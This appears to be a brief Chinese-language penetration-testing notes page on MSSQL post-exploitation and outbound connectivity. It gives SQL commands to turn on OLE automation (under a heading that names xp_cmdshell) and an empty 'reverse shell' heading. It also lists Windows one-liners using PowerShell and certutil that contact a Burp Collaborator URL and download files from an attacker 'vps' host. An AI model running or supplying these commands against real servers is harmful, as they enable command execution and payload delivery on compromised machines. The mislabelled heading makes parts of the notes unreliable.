notes

app下载

1
https://apps.evozi.com/

mssql

  • 开启xpcmdshell
    1
    2
    3
    4
    -- 开启
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
    --关毕
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
  • 开启sp_oacreate
    1
    2
    EXEC sp_configure 'show advanced options',1;RECONFIGURE WITH OVERRIDE;
    EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE WITH OVERRIDE;

    反弹shelll

出网

1
2
3
powershell Invoke-WebRequest -Uri http://8hqusgclehwflidvrby79sgm4da3ys.burpcollaborator.net
certutil.exe -urlcache -split -f http://vps/a.txt D:\a.txt
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://vps/a.txt', 'D:\a.txt')"